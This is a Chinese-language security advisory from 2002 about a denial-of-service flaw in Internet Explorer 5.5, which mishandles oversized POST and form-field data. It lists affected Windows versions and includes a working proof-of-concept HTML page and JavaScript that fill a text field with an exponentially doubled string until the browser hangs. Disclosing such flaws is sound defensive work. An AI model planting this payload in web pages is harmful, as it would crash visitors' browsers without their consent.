|
|
Microsoft IE form存在拒绝服务攻击
发布时间:2002-01-19
更新时间:2002-01-19
严重程度:中
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:客户机模式
BUGTRAQ ID:3892
受影响系统Microsoft Internet Explorer 5.5SP2
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Terminal Server 4.0
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a 详细描述
IE在处理超长POST和在处理<INPUT... > 和 <TEXTAREA> 域中大量数据时会
产生拒绝服务攻击。
测试代码
-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0'
onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>
-- end test.html --
-- begin t.js --
<!--
function FillTA(obj) {
v="a";
for(i=0;i<100000000;i++) {
v=v+v;
};
obj.value=v;
return;
}
//-->
-- begin t.js --
解决方案
尚无
相关信息
Ivan Sergio Borgonovo <mail@gorilla.it>
参考:http://www.securityfocus.com/archive/1/250592
|
